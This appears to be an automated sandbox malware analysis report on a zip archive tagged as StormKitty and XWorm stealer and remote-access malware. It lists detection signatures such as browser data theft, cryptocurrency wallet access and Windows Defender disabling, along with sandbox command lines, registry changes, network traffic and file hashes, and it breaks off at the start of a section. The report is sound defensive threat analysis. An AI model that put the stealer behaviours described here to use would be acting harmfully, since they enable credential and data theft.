Malware Analysis Report

2024-09-22 23:48

Sample ID 240519-vwc9aahd9y
Target cracutor-executor-main.zip
SHA256 587e590b78e0a3c36a4ac79ccec05415ca510e9ad20345ab39524e0130a8cb75
Tags
execution stormkitty xworm pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

587e590b78e0a3c36a4ac79ccec05415ca510e9ad20345ab39524e0130a8cb75

Threat Level: Known bad

The file cracutor-executor-main.zip was found to be: Known bad.

Malicious Activity Summary

execution stormkitty xworm pyinstaller rat spyware stealer trojan

StormKitty

Xworm

StormKitty payload

Detect Xworm Payload

Contains code to disable Windows Defender

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Deletes itself

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Unsigned PE

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Detects Pyinstaller

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: CmdExeWriteProcessMemorySpam

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-19 17:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240419-en

Max time kernel

118s

Max time network

119s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

138s

Max time network

128s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

135s

Max time network

135s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000956de7bbf2750dcf3e96053a3cf53c0fdfe31e82136a7f02f1ee98cfa324a4bd000000000e8000000002000020000000aa9c7ec6005c2e1c0d8b60f1c0d0c559e0a61287322a2f9c310c1fa4a6acb1e19000000019ea18d337f1da05a614b4e7adab7ebb1d0332beda4f422391969eea0125e8a18916e590b3607ce9148ebd8e046a921201fc45fe074c448df3196c8ac781de62a9f023d6708e60c1254835176e1539b8ba0a7220ef2d1a82bfc20b51233fe1ddb65894992702db7247532ebd6bde01c4bbe369c6e29a2e74cb3595f3fff225c30182dab27bea45f9a99e2bff86385f6e40000000c265f2700cc3323a75edb148b34e717e1b21c54394e313ef18cd0277558225df47ca2ab1581ffd4b1f8031800ecc94fb7e1b6c52b433d94439d5f0002074c863 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301135" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90dce40211aada01 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2D8D8B91-1604-11EF-989B-729E5AF85804} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000052260c01c53213f9e1f8064637f481cb826ac7e6da447c8ccc427f27f4a2f3d000000000e8000000002000020000000c6c8d80d85782a12eb5890500e3fe619a8f641465b5278917622af7d90a4e03c200000000c646705b686852f41c1a2ed54d6aca14339e3938dd61aebedcf999172bdb6924000000060b38a45fa4a4432be0ccf0b9295269927c40ca7dfd2e1b4e992a927ee236ced5e44ec18f30f7f0ea6dcedc43ed1bea7aa7a153f48fb941bcf53089025c286bb C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabB7BD.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarC453.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa80b60a431b389549cb26e5e9913373
SHA1 b0855a80f5da6000276e0f612a6179c63962b47f
SHA256 8d46e539fe50a477c58f135a29ba7d299707f1435b1e9154a76a07a302a1bcea
SHA512 649cfe3fde3fb1bfa3889eac4481c65afaf27754f06e521e2db99d667385a39e1905364ac8570f5422d1d86d116e0ec1a4cfaaae3ad97a3599655ffd475ab5ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a81738119ce0adef12954dfe99baa075
SHA1 130e1df2fa9c863107004a3c6f2ab997018ee018
SHA256 6c3c1d7b761c8493d4175c9b38395b4237869397ad027c6aa6849532fa6d0449
SHA512 fec3f964b71fcc481a9aad419b91981dc32f50e2f7802cf47af2cfaa1947a515eae0b27d03550f5a62cde1b5a05730dc37ccef1fb276a78ed6e7a336a8710f1a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3b1efb914d64a90b8c1b91c2d67e40b5
SHA1 a0ba7dfe0773ab8beff3b70ab40392c2a073c7ba
SHA256 5be90f278cc26177b98fe5418bbfeff800c135acae8f31807052858ffb856262
SHA512 27c3d4a72a9d1c01bdc0d1f6c29ddce5dfaa7ca7be569b2a4d7d77733c002fefb10df9a0be61cc2cfa0347c18d02def4a634754b629fd4f98dde8fb99c4af161

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fb85b73b4a2f2fe654ba401b77baf990
SHA1 527395dd766110adf5a30feb83735f0c9e633728
SHA256 a65b8356894635ddb7ca7ccb6298c4717f26db6340c6150b473c00768007d71e
SHA512 8df9c0c4b9bed9387ca95448ee4e508abeb3f03916ff9d15a53af45fdaddc6413bc28f3b25f501edcc8856592a1cf0e89c689f6b2b8a50f814c0fdd5fa7a8311

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 22f0f1d0d65d7afd19af79e886c29f7a
SHA1 78163f71b84e0b8d263f0089d6f2e1a05746c1f2
SHA256 e026e9a37b1bacf603c0ada8b5c468a427ed4042a5cd926066f804c9a4808e83
SHA512 5bcda6bce6c2bae3531b03d48de16b4845ec98968a7e2443d7c04936af0fb4feeeac148158d4b22d5b31d814173defc645a32f26b33035dd4e209aa4c508f708

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 47dea7a0e474654a268679ca13126a35
SHA1 23ef6714b518c4c5c21a05ce0d3b59e535246c88
SHA256 94d68176ce718a5d100e86a37b665bb2b3466af0d8b8242a818a0add3427253f
SHA512 a615ff216c604e860bd66c014fcd28d998c82d93fb0553214358466a46cc5b45861047604b9fa3b47d7b849efc257a0857a7d1b10f48d0b3d8d6ac13d043f11e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5b6e267ecf346fd56ce5f917a52efcc3
SHA1 1ae835f983d91e12caa7478a1893016e32977163
SHA256 9a294b6a4a2465a2654920109df99a788b9147e5b2e1dd9efe59dc06ec000913
SHA512 ada7d48f2e9a2425acf72adc69e64c5600b552d3afada4dd0fe2cd94573e89620ee716a5daa5cce8284febce884584b9c8783f00cd4f54e7e2b39b9c23d8221b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7b18bebe97e9610a0d82eba114a5ffcd
SHA1 279d386d19b41bbe9a5c3903ab41cd7b82ae7cd8
SHA256 4318efa06be4463e8c5dd1ab36b2bc576c8141aa573e62bae1b945b0a35d8cbf
SHA512 1c5565413ad3fc5d7b5fd162ef05b6bae34797e2f2fb554d4bc33d46d675dad0bceebc1d8d846c9212e9511c85afdbd480476b606d0ff231b5c869eb241d98e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3acf8dd835de8abdcb4b441d914f00c2
SHA1 34f9fa11f06e26bdd2411e1b7f01c78f87f9dcaf
SHA256 76e90047dac46c1c9773cf12509d5137f56f68d338e9f0367095212133168776
SHA512 8e7fbfaf5c4a0cf86cd678a775f7dee23b35a29d4626473f737bf2cc3a18d43fff179d49da45964bb6030a363ba3b0ae246c97daaa90e398f6ff2f6345373291

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bf548f216a0782ae63cd4112299514ec
SHA1 4e3d61fd5e54dc9737f3e90742b3b0efb29b95f1
SHA256 430406aff8ada2ef19c6bd1e7d984f87f49ded89493de181c087ce46c8745d35
SHA512 badf0ffad69fbb351ba1bad6d566827d6c2b61a2c6a5ca7d08f1252adee90b47311b48708b2f3eca90bf745ff8ec566f48602c04fe144d96870e61465ebc1dc2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 554e7462ce317fd187ba35441cc79e26
SHA1 5c9852e821471202cf8e6388caa3ee5faf2be738
SHA256 cef08c0e2b2888f11e83eb55c8555e87ec68f83e5926d5ffe71b3933fc03e3d6
SHA512 7ae66b31119c30d49b42cbdfd7260b34758625a533b5fa07366bf417a0f8458aef1dfda02cf5d81cf8a81b7b1f988b4c0b0430207ce6fefefdaac3702b3132b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d88ab1419be9005e0c983a9e59e7fa43
SHA1 604af517a6381165116a3a53a04a636eb4103fcd
SHA256 a6a6ca0d0033125beb10f1e2a3f792575b0ff09974d93fe1fed63be3b634438f
SHA512 ae72b0dd0b113f8847a16bdcb79567a101e0e90f3c6c8679360ae4611f5ff179d940a5b33bb579ecd3f1140d1a65d42ebbcb967a962125720ec30ef8ac0547b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6621842d05744e79f247a60810a59d2a
SHA1 999e7291e393b6b8d5f12f243da0f13b797f8413
SHA256 ce1fa41a78d72edafa64cd78c0cef31fc59ae5453cb48563644c66cf3acb35dc
SHA512 087ec76eb668bdb15d26ace26f7a38e63751a4a29af119388f724c98a716d9861de4513d19bf5300f7ce1ebb3c90b5a777f6dc4f608418869a5d6aafb51db05c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 356607389d7ef438719bb7d88942f3ab
SHA1 196bd6b7c53dc6ba5d420fb7e454490bbf718426
SHA256 986ac311ff9ccaece1d620b35863b400e9f9c7eff08448e2c99f2a3de2310d40
SHA512 aa28f4ddb70a87fc13f2dbfc4c7f8fb8a9a62dd5cc17d8d85d5226b2c3f5f638eccb7f48624fb12bdfe11c2246916bc327843dad6a0258e6c9d700a5c762c8b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 117ee0a8982ecfda5c4c63616e5fcba0
SHA1 10f637bd4834a5d29449baa92615ee73f8ff64e3
SHA256 423d5c18c479a408a5908b5027b6817f55dc4b7f5a10c3b129da1b5945ad2411
SHA512 c92d54a6371e1b24fb804a6abf201efb49fdcebc3ca78873275ecf1f4ad1b0c988e09354b498b3107340bca64595ebe9279d5ba9084fca7f172fa19794376099

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4cc770a87bac4e90e069d9c8d6dc8d6b
SHA1 a03430fb8805c03e50c323be73b19cd020dae492
SHA256 e01af19691bb7affdf71b484831a56b42be503a86091d5cc532d8d3874c4066d
SHA512 6af1ebfc188e8155258d03592475e3451810f1476e7c8628b36d39ec3e06c65e337f9674822923a04c92aaf36fb271d62df3303d621ff230a8c4395c380380e0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5592c3c3b6ebfc24352e388f138c7e8
SHA1 1a71e444b8eda4012d4219e75d378e344793527a
SHA256 2d0f461f013c84353fce8413221df5cc543123914bb4a2eafbfd65e02b89d8bf
SHA512 c380efe884d102c7836721bc41f92d021a5d2923aee63b2f7ef67f05aa41afdcd615269a77df947f21fdf3a812f23213cf356f5f4e6c338a686e56933bf31e96

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5ca5b3f39221bad1e085f5bf9e0c33fd
SHA1 c79d2df616e2c7d28a46770b06dc3486b82f4915
SHA256 a454abbafe8206958f2ac9ef551f11624a06c90862dd9ac8b30b442cf316fcb3
SHA512 4b074bd4a70a6aa9ce6c6b3cde7bff2e22aaa800d480fe22315a43d9aa99a2516cd99ec7edf4d3032ce747d8d1f6fbd034a5597739b46e4af2f41ecd06a3d36e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c86e7d1608bbc45768dd3eed83c125a
SHA1 c4b68763d0608b97561e24889b1928e37283fb1a
SHA256 d7cb00a4b8c149a74b1dc17b57ea0263fc032048ae00890d69f15a50c5868841
SHA512 d0a6f7c2c02c49a04f8ae2a3315df7337a01809a09ca168b9c1e562364b4367802884bb9851009c859c0ceb586c666c16b038dc0048b1dc95b83da9304ca2441

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

